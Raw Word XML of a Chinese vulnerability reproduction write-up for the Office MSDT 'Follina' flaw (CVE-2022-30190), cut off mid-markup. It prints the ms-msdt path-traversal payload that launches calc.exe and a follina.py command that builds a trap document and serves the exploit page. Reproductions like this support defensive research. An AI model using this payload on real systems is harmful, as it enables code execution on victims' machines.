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A191" w14:textId="0F6E214C" w:rsidR="00BF231A" w:rsidRDefault="008200A6" w:rsidP="00B356A7">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="008200A6">
        <w:t xml:space="preserve">Microsoft Office Word MSDTJS Remote Code Execution Vulnerability </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB8D7B6" w14:textId="44440B3B" w:rsidR="00010FA0" w:rsidRDefault="008200A6" w:rsidP="00713A03">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="008200A6">
        <w:t>CVE-2022-30190</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a5"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1416"/>
        <w:gridCol w:w="6804"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BD6588" w:rsidRPr="00BD6588" w14:paraId="00C8056D" w14:textId="77777777" w:rsidTr="00BE17EB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DC18DA6" w14:textId="6C0F5650" w:rsidR="00BD6588" w:rsidRPr="00BD6588" w:rsidRDefault="00BD6588" w:rsidP="00713A03">
            <w:pPr>
              <w:pStyle w:val="21"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BD6588">
              <w:t>N</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD6588">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ame</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD6588">
              <w:t>_zh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6804" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2563CD4F" w14:textId="34D4C09D" w:rsidR="00BD6588" w:rsidRPr="00407610" w:rsidRDefault="00713A03" w:rsidP="00713A03">
            <w:pPr>
              <w:pStyle w:val="21"/>
            </w:pPr>
            <w:r w:rsidRPr="00713A03">
              <w:t xml:space="preserve">Microsoft </w:t>
            </w:r>
            <w:r w:rsidR="00461705" w:rsidRPr="0096118E">
              <w:t>Office Word</w:t>
            </w:r>
            <w:r w:rsidRPr="00713A03">
              <w:t xml:space="preserve"> 支持诊断工具(MSDT)远程代码执行漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD6588" w:rsidRPr="00BD6588" w14:paraId="3998E510" w14:textId="77777777" w:rsidTr="00BE17EB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1484E325" w14:textId="554262CE" w:rsidR="00BD6588" w:rsidRPr="00BD6588" w:rsidRDefault="00BD6588" w:rsidP="00713A03">
            <w:pPr>
              <w:pStyle w:val="21"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BD6588">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD6588">
              <w:t>ame_en</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6804" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="490AACED" w14:textId="67C56AC3" w:rsidR="00BD6588" w:rsidRPr="00BD6588" w:rsidRDefault="0096118E" w:rsidP="00713A03">
            <w:pPr>
              <w:pStyle w:val="21"/>
            </w:pPr>
            <w:r w:rsidRPr="0096118E">
              <w:t>Microsoft Office Word MSDTJS Remote Code Execution Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD6588" w:rsidRPr="00BD6588" w14:paraId="33DE4E74" w14:textId="77777777" w:rsidTr="00BE17EB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39987A9E" w14:textId="68BD7047" w:rsidR="00BD6588" w:rsidRPr="00BD6588" w:rsidRDefault="00BD6588" w:rsidP="00713A03">
            <w:pPr>
              <w:pStyle w:val="21"/>
            </w:pPr>
            <w:r w:rsidRPr="00BD6588">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD6588">
              <w:t>VE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6804" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29A4D724" w14:textId="19BA70A3" w:rsidR="00BD6588" w:rsidRPr="00BD6588" w:rsidRDefault="008200A6" w:rsidP="00713A03">
            <w:pPr>
              <w:pStyle w:val="21"/>
            </w:pPr>
            <w:r w:rsidRPr="008200A6">
              <w:t>CVE-2022-30190</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD6588" w:rsidRPr="00BD6588" w14:paraId="37D9A62B" w14:textId="77777777" w:rsidTr="00BE17EB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="727491D4" w14:textId="2DE6DA74" w:rsidR="00BD6588" w:rsidRPr="00BD6588" w:rsidRDefault="00BD6588" w:rsidP="00713A03">
            <w:pPr>
              <w:pStyle w:val="21"/>
            </w:pPr>
            <w:r w:rsidRPr="00BD6588">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD6588">
              <w:t>VS</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD6588">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>S评分</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6804" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D0B5C1C" w14:textId="554C577C" w:rsidR="00BD6588" w:rsidRPr="00BD6588" w:rsidRDefault="00BA1E58" w:rsidP="00713A03">
            <w:pPr>
              <w:pStyle w:val="21"/>
            </w:pPr>
            <w:r w:rsidRPr="00BA1E58">
              <w:t>7.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD6588" w:rsidRPr="00BD6588" w14:paraId="3F8F5274" w14:textId="77777777" w:rsidTr="00BE17EB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33C88D2C" w14:textId="0AB1E5C4" w:rsidR="00BD6588" w:rsidRPr="00BD6588" w:rsidRDefault="00BD6588" w:rsidP="00713A03">
            <w:pPr>
              <w:pStyle w:val="21"/>
            </w:pPr>
            <w:r w:rsidRPr="00BD6588">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>威胁等级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6804" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FDCAAC0" w14:textId="13AD969D" w:rsidR="00BD6588" w:rsidRPr="00BD6588" w:rsidRDefault="00157557" w:rsidP="00713A03">
            <w:pPr>
              <w:pStyle w:val="21"/>
            </w:pPr>
            <w:r>
              <w:t>H</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>igh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD6588" w:rsidRPr="00BD6588" w14:paraId="0175D2AB" w14:textId="77777777" w:rsidTr="00BE17EB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="785B09A6" w14:textId="7B4B9893" w:rsidR="00BD6588" w:rsidRPr="00BD6588" w:rsidRDefault="00BD6588" w:rsidP="00713A03">
            <w:pPr>
              <w:pStyle w:val="21"/>
            </w:pPr>
            <w:r w:rsidRPr="00BD6588">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>CNNVD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6804" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="578E1984" w14:textId="4AC0CA0C" w:rsidR="00BD6588" w:rsidRPr="00BD6588" w:rsidRDefault="00FA6E7D" w:rsidP="00713A03">
            <w:pPr>
              <w:pStyle w:val="21"/>
            </w:pPr>
            <w:r>
              <w:t>----</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD6588" w:rsidRPr="00BD6588" w14:paraId="4C7DFC7F" w14:textId="77777777" w:rsidTr="00BE17EB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="201FAB50" w14:textId="370F59BB" w:rsidR="00BD6588" w:rsidRPr="00BD6588" w:rsidRDefault="00BD6588" w:rsidP="00713A03">
            <w:pPr>
              <w:pStyle w:val="21"/>
            </w:pPr>
            <w:r w:rsidRPr="00BD6588">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>其他id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6804" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79FBD096" w14:textId="4FE9A6B0" w:rsidR="00BD6588" w:rsidRPr="00BD6588" w:rsidRDefault="002D6638" w:rsidP="00713A03">
            <w:pPr>
              <w:pStyle w:val="21"/>
            </w:pPr>
            <w:r>
              <w:t>----</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD6588" w:rsidRPr="00BD6588" w14:paraId="7BA397D0" w14:textId="77777777" w:rsidTr="00BE17EB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="025F63B3" w14:textId="4236219F" w:rsidR="00BD6588" w:rsidRPr="00BD6588" w:rsidRDefault="00BD6588" w:rsidP="00713A03">
            <w:pPr>
              <w:pStyle w:val="21"/>
            </w:pPr>
            <w:r w:rsidRPr="00BD6588">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>受影响软件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6804" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="208078B6" w14:textId="2FBFE20B" w:rsidR="00BD6588" w:rsidRPr="00BD6588" w:rsidRDefault="00EC3329" w:rsidP="00713A03">
            <w:pPr>
              <w:pStyle w:val="21"/>
            </w:pPr>
            <w:r w:rsidRPr="0096118E">
              <w:t>Microsoft Office Word</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0138381D" w14:textId="363691BC" w:rsidR="00010FA0" w:rsidRDefault="00010FA0" w:rsidP="00010FA0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简介</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF0492A" w14:textId="6EE9F9B6" w:rsidR="00CA0A1C" w:rsidRPr="00544630" w:rsidRDefault="00544630" w:rsidP="00544630">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="00544630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可利用恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="00544630">
        <w:t xml:space="preserve"> Office 文件中的远程模板功能从远程网络服务器获取恶意 HTML 文件，通过微软支持诊断工具（Microsoft Support Diagnostic Tool，MSDT）执行恶意 PowerShell 代码。该漏洞在宏被禁用的情况下，仍然可以调用 MSDT 执行恶意代码。并且当恶意文件另存为 RTF 格式时，还可以通过 Windows 资源管理器中的预览窗格触发此漏洞的调用，无需执行也可以在目标机器上执行任意代码。</w:t>
      </w:r>
      <w:r w:rsidRPr="00544630">
        <w:cr/>
      </w:r>
      <w:r w:rsidRPr="00544630">
        <w:cr/>
      </w:r>
    </w:p>
    <w:p w14:paraId="456D4E9E" w14:textId="12525BF8" w:rsidR="00CA0A1C" w:rsidRPr="00713A03" w:rsidRDefault="00372499" w:rsidP="00713A03">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="00372499">
        <w:t>The attacker can use the remote template function in the malicious office file to obtain the malicious HTML file from the remote network server and execute the malicious PowerShell code through the Microsoft support diagnostic tool (MSDT). This vulnerability can still call MSDT to execute malicious code when macros are disabled. When the malicious file is saved in RTF format, the call of this vulnerability can also be triggered through the preview pane in Windows Explorer, and arbitrary code can be executed on the target machine without execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E454D88" w14:textId="7F6E8372" w:rsidR="00D950DB" w:rsidRDefault="00D950DB" w:rsidP="00CA0A1C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r w:rsidRPr="00D950DB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞影响</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB59D68" w14:textId="516B1C91" w:rsidR="00713A03" w:rsidRPr="00713A03" w:rsidRDefault="00713A03" w:rsidP="00713A03">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="00713A03">
        <w:rPr>
          <w:rStyle w:val="22"/>
        </w:rPr>
        <w:t>Microsoft Office 2013 Service Pack 1 (64-bit edition)</w:t>
      </w:r>
      <w:r w:rsidRPr="00713A03">
        <w:rPr>
          <w:rStyle w:val="22"/>
        </w:rPr>
        <w:cr/>
        <w:t>Microsoft Office 2013 Service Pack 1 (32-bit edition)</w:t>
      </w:r>
      <w:r w:rsidRPr="00713A03">
        <w:rPr>
          <w:rStyle w:val="22"/>
        </w:rPr>
        <w:cr/>
        <w:t>Microsoft Office 2016 (64-bit edition)</w:t>
      </w:r>
      <w:r w:rsidRPr="00713A03">
        <w:rPr>
          <w:rStyle w:val="22"/>
        </w:rPr>
        <w:cr/>
        <w:t>Microsoft Office 2016 (32-bit edition)</w:t>
      </w:r>
      <w:r w:rsidRPr="00713A03">
        <w:rPr>
          <w:rStyle w:val="22"/>
        </w:rPr>
        <w:cr/>
        <w:t>Microsoft Office LTSC 2021 for 32-bit edition</w:t>
      </w:r>
      <w:r w:rsidRPr="00713A03">
        <w:rPr>
          <w:rStyle w:val="22"/>
        </w:rPr>
        <w:cr/>
        <w:t>Microsoft Office LTSC 2021 for 64-bit edition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEFBDAE" w14:textId="1D98868D" w:rsidR="00D950DB" w:rsidRPr="00713A03" w:rsidRDefault="00D950DB" w:rsidP="00713A03">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r w:rsidRPr="00713A03">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2035DEB7" w14:textId="46E52805" w:rsidR="00D950DB" w:rsidRPr="00CD7A51" w:rsidRDefault="00D950DB" w:rsidP="00713A03">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD7A51">
        <w:t>实验环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347BCCD2" w14:textId="77777777" w:rsidR="00531A25" w:rsidRPr="00CD7A51" w:rsidRDefault="00531A25" w:rsidP="00713A03">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD7A51">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>准备两台虚拟机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6D7626" w14:textId="77777777" w:rsidR="00531A25" w:rsidRPr="00CD7A51" w:rsidRDefault="00531A25" w:rsidP="00713A03">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD7A51">
        <w:t>kali.2020       192.168.160.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5A4BD2" w14:textId="39B71C8C" w:rsidR="00531A25" w:rsidRPr="00CD7A51" w:rsidRDefault="00531A25" w:rsidP="00713A03">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD7A51">
        <w:t>Windows 10    192.168.160.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F66920E" w14:textId="3F77147F" w:rsidR="00BA15E3" w:rsidRDefault="009E018A" w:rsidP="00713A03">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="009E018A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Microsoft Office </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="009E018A">
        <w:t>2016</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565A33FC" w14:textId="77777777" w:rsidR="003C69A2" w:rsidRDefault="003C69A2" w:rsidP="00713A03">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78BB9ECA" w14:textId="46A7DBF6" w:rsidR="002916E5" w:rsidRDefault="00514360" w:rsidP="00713A03">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ord使用版本如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ED8D03" w14:textId="4C5CF8EF" w:rsidR="00F37F72" w:rsidRDefault="00052933" w:rsidP="00713A03">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="00052933">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FC4D4BD" wp14:editId="28923A40">
            <wp:extent cx="5274310" cy="2821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1940"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C6B684" w14:textId="6437755F" w:rsidR="008305A2" w:rsidRDefault="00C50A46" w:rsidP="00713A03">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大体是</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2772">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意的</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2772">
        <w:t>Word文档，使用远程模板功能，以从一个远程服务器获取HTML文件。HTML代码然后使用微软的MS-MSDT URI协议执行PowerShell代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751802DF" w14:textId="3336C84D" w:rsidR="008305A2" w:rsidRDefault="008305A2" w:rsidP="00713A03">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="008305A2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57AEFBB3" wp14:editId="6EC2B6F5">
            <wp:extent cx="7570382"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4936" cy="1734593"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06529EDE" w14:textId="1B835AE0" w:rsidR="008305A2" w:rsidRDefault="00241755" w:rsidP="00713A03">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="00241755">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>核心：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00241755">
        <w:t>location.href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00241755">
        <w:t xml:space="preserve"> = "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00241755">
        <w:t>ms-msdt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00241755">
        <w:t xml:space="preserve">:/id </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00241755">
        <w:t>PCWDiagnostic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00241755">
        <w:t xml:space="preserve"> /skip force /param \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00241755">
        <w:t>IT_RebrowseForFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00241755">
        <w:t xml:space="preserve">=? </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00241755">
        <w:t>IT_LaunchMethod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00241755">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00241755">
        <w:t>ContextMenu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00241755">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00241755">
        <w:t>IT_BrowseForFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00241755">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00241755">
        <w:t>/..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00241755">
        <w:t>/../$(\\windows\\system32\\calc)/.exe\"";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239A7480" w14:textId="023E1EA9" w:rsidR="008305A2" w:rsidRDefault="008305A2" w:rsidP="00713A03">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="242AFB55" w14:textId="2C0B9CA3" w:rsidR="00EE04BA" w:rsidRDefault="00EE04BA" w:rsidP="00713A03">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5484EE7B" w14:textId="0E03CE82" w:rsidR="00E92323" w:rsidRDefault="00E92323" w:rsidP="00713A03">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E92323">
        <w:t>python .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E92323">
        <w:t>\follina.py -t docx -m binary -b calc.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C918D23" w14:textId="77777777" w:rsidR="00E92323" w:rsidRDefault="00E92323" w:rsidP="00E92323">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>Generated 'clickme.docx' in current directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E07478" w14:textId="77777777" w:rsidR="00E92323" w:rsidRDefault="00E92323" w:rsidP="00E92323">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>Generated 'exploit.html' in 'www' directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43160D9E" w14:textId="1BE10A12" w:rsidR="00E92323" w:rsidRDefault="00E92323" w:rsidP="00E92323">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>Serving payload on http://localhost:80/exploit.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9E5B32" w14:textId="6365D1D7" w:rsidR="00E92323" w:rsidRDefault="00E92323" w:rsidP="00713A03">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54300DB4" w14:textId="4C1C8BF6" w:rsidR="00350B5F" w:rsidRDefault="00350B5F" w:rsidP="00713A03">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="00350B5F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后浏览器打开：</w:t>
      </w:r>
      <w:r w:rsidRPr="00350B5F">
        <w:t>http://localhost:80/exploit.html 出现：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2676AE90" w14:textId="3F483792" w:rsidR="00E92323" w:rsidRDefault="008E0839" w:rsidP="00713A03">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="008E0839">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5358373D" wp14:editId="30A1B239">
            <wp:extent cx="6147684" cy="37814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5761" cy="3786393"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5088B4E7" w14:textId="32BE0881" w:rsidR="008E0839" w:rsidRDefault="008E0839" w:rsidP="00713A03">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="008E0839">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击打开，最后弹出</w:t>
      </w:r>
      <w:r w:rsidRPr="008E0839">
        <w:t>calc.exe进程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5918CD" w14:textId="0C481B23" w:rsidR="008E0839" w:rsidRDefault="008E0839" w:rsidP="00713A03">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2786C1B2" wp14:editId="6ECF863D">
            <wp:extent cx="3843034" cy="3267075"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="4" name="图片 4" descr="https://img2022.cnblogs.com/blog/1011569/202206/1011569-20220602112227441-279918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2.cnblogs.com/blog/1011569/202206/1011569-20220602112227441-2799184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1991" cy="3283191"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4545BC05" w14:textId="5EF479F9" w:rsidR="00E8378B" w:rsidRDefault="00E8378B" w:rsidP="00713A03">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在word中</w:t>
      </w:r>
      <w:r w:rsidR="00072A23">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动好服务后再点击我们的doc文件即可触发漏洞</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E8378B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>采集到的运行截图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
